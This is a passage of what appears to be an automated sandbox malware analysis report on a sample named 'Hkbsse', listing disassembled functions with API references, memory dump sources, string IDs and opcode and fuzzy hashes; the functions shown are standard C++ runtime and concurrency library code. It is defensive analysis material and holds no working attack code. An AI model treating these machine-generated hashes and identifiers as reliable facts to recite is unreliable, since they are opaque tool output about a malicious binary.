                    • API String ID: 2141394445-3154422776
                    • Opcode ID: 1b8a5219dacf47ec03d32c1aec8fefea155487b99710d83f1d7aad74c904c1a2
                    • Instruction ID: 5982c27aeec872d2574ee75d90a85c5a0ba858edd689f383aa7f969d4c346686
                    • Opcode Fuzzy Hash: 1b8a5219dacf47ec03d32c1aec8fefea155487b99710d83f1d7aad74c904c1a2
                    • Instruction Fuzzy Hash: 16E0483464021876CB25BE55D807BC97778972034AF508017B911211A29BFC57CCD989
                    Function 044A26C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044A266C
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 044A2682
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 044A2BB8
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044A2BCC
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044A2BED
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044A2C56
                      • Part of subcall function 044A2BA9: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044A2DC4
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
                    • String ID: @[F
                    • API String ID: 3302332639-1227568360
                    • Opcode ID: 153f3236cdbabbe7db1991ef0cf1f88b6a31994afc8e27e540a562292e0a9b1f
                    • Instruction ID: 1f190930fedc5c76b3540ea7865bca612c638bc388a693a9ad6f695476cc332f
                    • Opcode Fuzzy Hash: 153f3236cdbabbe7db1991ef0cf1f88b6a31994afc8e27e540a562292e0a9b1f
                    • Instruction Fuzzy Hash: AEE012B0B006019BEF28AF95995475573A8BB54708F80056FD1048E341E7F5F810A74A
                    Function 004024A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 004024BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 3730dae516e2db0038084a6e01249f6a9c5f8554e197c263b70ab42fed9b62c6
                    • Instruction ID: acdab43ea0f454e5b568466deb4dea61ad9a442cdd38150ed4eca4c6d96c7cd7
                    • Opcode Fuzzy Hash: 3730dae516e2db0038084a6e01249f6a9c5f8554e197c263b70ab42fed9b62c6
                    • Instruction Fuzzy Hash: 71D0C2B2910308A7C200DF98C800842BBDC9E19315700C52BF944E7201F3B0E8848BA8
                    Function 00402580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040259E
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 3e913364fa5ea32c817d1b94c44d2086dc151819d2061fcb1bc8fdb026396fa3
                    • Instruction ID: 36b4a820664289b2779fabdb349dd3e31dd3f8a7d41fa5f4faa77770d1d2b202
                    • Opcode Fuzzy Hash: 3e913364fa5ea32c817d1b94c44d2086dc151819d2061fcb1bc8fdb026396fa3
                    • Instruction Fuzzy Hash: 41D02BB291030857C710DF98CC00842B7DCDE19315700C92BF944E7201F3B0E894CBE8
                    Function 00430CE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 00430CFA
                      • Part of subcall function 0042D9C0: Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 0042D9F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$BaseBase::~Concurrency::details::Internal
                    • String ID: B$B
                    • API String ID: 1065816584-1850355789
                    • Opcode ID: 5fc58df1e84948ee6e121ba395f9e2b525534bd4c2c1d5557bd544cbab0759a5
                    • Instruction ID: d343d55d842dc0c5f7550b210159b9d4af8cf7a514022aa9f7c69f9350428cd9
                    • Opcode Fuzzy Hash: 5fc58df1e84948ee6e121ba395f9e2b525534bd4c2c1d5557bd544cbab0759a5
                    • Instruction Fuzzy Hash: 0ED0A5B214431515C3141ED9750679577C84F06755F14C05FFD5857283DFF9548442DD
                    Function 00402E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E1D
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E26
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: efb077dd9d90d760ce7937592e4120b290c0c6b94cc5addc2e5bc00b41a1a09e
                    • Instruction ID: d60a9d71acd9a2374f3681a4d886ad7491f8954107def6b53710e47b223ef30e
                    • Opcode Fuzzy Hash: efb077dd9d90d760ce7937592e4120b290c0c6b94cc5addc2e5bc00b41a1a09e
                    • Instruction Fuzzy Hash: C4D012BAC423155BC721EF90A9458C777DCAE053153504D1FE89593611E7B8A9C88F94